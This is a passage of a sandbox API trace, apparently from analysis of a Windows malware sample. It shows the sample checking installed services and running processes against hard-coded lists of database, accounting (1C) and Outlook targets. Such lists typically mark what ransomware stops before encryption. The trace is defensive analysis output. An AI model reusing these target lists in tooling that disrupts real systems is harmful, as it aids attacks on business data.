lstrlenW (lpString="SamSs") returned 5 [0057.734] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0057.734] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0057.734] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0057.734] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0057.734] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0057.734] lstrlenW (lpString="Schedule") returned 8 [0057.734] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0057.734] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0057.734] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0057.734] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0057.734] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0057.734] lstrlenW (lpString="SENS") returned 4 [0057.734] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0057.734] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0057.735] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0057.735] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0057.735] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0057.735] lstrlenW (lpString="ShellHWDetection") returned 16 [0057.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0057.735] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0057.735] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0057.735] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0057.735] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0057.735] lstrlenW (lpString="Spooler") returned 7 [0057.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0057.735] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0057.735] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0057.735] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0057.735] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0057.735] lstrlenW (lpString="swprv") returned 5 [0057.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0057.735] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0057.735] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0057.735] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0057.735] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0057.735] lstrlenW (lpString="SysMain") returned 7 [0057.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0057.735] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0057.735] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0057.735] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0057.735] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0057.735] lstrlenW (lpString="Themes") returned 6 [0057.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0057.735] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0057.735] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0057.735] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0057.735] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0057.735] lstrlenW (lpString="TrkWks") returned 6 [0057.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0057.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0057.736] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0057.736] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0057.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0057.736] lstrlenW (lpString="UxSms") returned 5 [0057.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0057.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0057.736] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0057.736] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0057.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0057.736] lstrlenW (lpString="VSS") returned 3 [0057.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0057.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0057.736] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0057.736] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0057.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0057.736] lstrlenW (lpString="WdiServiceHost") returned 14 [0057.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0057.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0057.736] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0057.736] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0057.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0057.736] lstrlenW (lpString="WdiSystemHost") returned 13 [0057.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0057.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0057.736] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0057.736] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0057.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0057.736] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0057.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0057.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0057.736] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0057.736] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0057.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0057.737] lstrlenW (lpString="Winmgmt") returned 7 [0057.737] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0057.737] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0057.737] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0057.737] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0057.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0057.737] lstrlenW (lpString="WPDBusEnum") returned 10 [0057.737] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0057.737] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0057.737] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0057.737] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0057.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0057.737] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39626f0 | out: hHeap=0x570000) returned 1 [0057.737] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x164 [0057.739] Process32FirstW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0057.740] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0057.741] lstrlenW (lpString="System") returned 6 [0057.741] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0057.741] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0057.741] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0057.741] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0057.741] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0057.741] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0057.741] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0057.741] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0057.742] lstrlenW (lpString="smss.exe") returned 8 [0057.742] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0057.742] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0057.742] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0057.742] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0057.742] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0057.742] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0057.742] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0057.742] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0057.743] lstrlenW (lpString="csrss.exe") returned 9 [0057.743] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0057.743] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0057.743] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0057.743] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0057.743] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0057.743] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0057.743] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0057.743] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0057.744] lstrlenW (lpString="wininit.exe") returned 11 [0057.744] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0057.744] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0057.744] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0057.744] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0057.745] lstrlenW (lpString="csrss.exe") returned 9 [0057.745] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0057.745] lstrlenW (lpString="winlogon.exe") returned 12 [0057.745] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0057.746] lstrlenW (lpString="services.exe") returned 12 [0057.746] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0057.747] lstrlenW (lpString="lsass.exe") returned 9 [0057.747] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0057.747] lstrlenW (lpString="lsm.exe") returned 7 [0057.747] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.748] lstrlenW (lpString="svchost.exe") returned 11 [0057.748] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.749] lstrlenW (lpString="svchost.exe") returned 11 [0057.749] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.750] lstrlenW (lpString="svchost.exe") returned 11 [0057.750] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.750] lstrlenW (lpString="svchost.exe") returned 11 [0057.750] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.751] lstrlenW (lpString="svchost.exe") returned 11 [0057.751] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0057.752] lstrlenW (lpString="audiodg.exe") returned 11 [0057.752] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.753] lstrlenW (lpString="svchost.exe") returned 11 [0057.753] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.753] lstrlenW (lpString="svchost.exe") returned 11 [0057.753] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0057.754] lstrlenW (lpString="dwm.exe") returned 7 [0057.754] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0057.755] lstrlenW (lpString="explorer.exe") returned 12 [0057.755] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0057.755] lstrlenW (lpString="spoolsv.exe") returned 11 [0057.756] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0057.756] lstrlenW (lpString="taskhost.exe") returned 12 [0057.756] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.757] lstrlenW (lpString="svchost.exe") returned 11 [0057.757] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0057.758] lstrlenW (lpString="taskeng.exe") returned 11 [0057.758] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0057.758] lstrlenW (lpString="taskhost.exe") returned 12 [0057.758] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0057.759] lstrlenW (lpString="called.exe") returned 10 [0057.759] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0057.760] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0057.760] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0057.761] lstrlenW (lpString="analyst.exe") returned 11 [0057.761] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0057.761] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0057.761] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0057.762] lstrlenW (lpString="wages.exe") returned 9 [0057.762] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0057.763] lstrlenW (lpString="rand.exe") returned 8 [0057.763] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0057.764] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0057.764] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0057.764] lstrlenW (lpString="cottage.exe") returned 11 [0057.764] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0057.765] lstrlenW (lpString="pairs_spec.exe") returned 14 [0057.765] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0057.766] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0057.766] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0057.766] lstrlenW (lpString="observationshairy.exe") returned 21 [0057.766] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0057.767] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0057.767] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0057.768] lstrlenW (lpString="spectrum.exe") returned 12 [0057.768] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0057.769] lstrlenW (lpString="dies.exe") returned 8 [0057.769] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0057.769] lstrlenW (lpString="configured.exe") returned 14 [0057.769] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0057.770] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0057.770] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0057.771] lstrlenW (lpString="fast.exe") returned 8 [0057.771] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0057.771] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0057.771] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0057.772] lstrlenW (lpString="review.exe") returned 10 [0057.772] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0057.773] lstrlenW (lpString="historybinding.exe") returned 18 [0057.773] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0057.774] lstrlenW (lpString="pk task surge.exe") returned 17 [0057.774] Process32NextW (in: hSnapshot=0x164, lppe=0x217fd34 | out: 